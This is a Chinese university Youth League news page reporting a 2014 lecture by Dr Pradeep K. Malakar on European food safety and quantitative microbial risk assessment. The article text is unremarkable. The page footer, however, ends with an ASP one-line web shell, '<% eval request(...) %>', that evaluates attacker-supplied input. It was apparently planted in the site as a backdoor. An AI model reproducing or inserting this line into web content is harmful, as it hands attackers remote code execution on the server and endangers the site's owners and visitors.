当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 学院动态 >> 正文  
站内信息搜索:
“东方学者”讲座教授Pradeep Kumar Malakar博士应邀作学术报告
[2014年04月15日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    2014年4月11日,我校“东方学者”讲座教授Pradeep K. Malakar博士应邀为我校师生作了题为“欧洲的食品安全”的学术报告,报告会由食品学院赵勇教授主持。

    Malakar博士现为英国食品研究院(IFR)Senior Research Scientist。主要研究领域为食品安全、预测微生物学和风险评估研究。

    讲座中,Makalu博士从“欧洲食品安全”、“英国食品安全”和“定量微生物风险评估”三个方面介绍了目前国外食品安全研究。同时结合目前我国食品安全问题与大家进行了讨论。

    通过这次学术报告,师生们了解了国外食品安全研究及微生物风险评估的主要进展,并对我国的食品安全有了独特见解。

 

关闭窗口

上一篇:水产与生命学院研究生会开展素质拓展活动

下一篇:人文学院志愿者五四青年节心系“空巢”老人
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>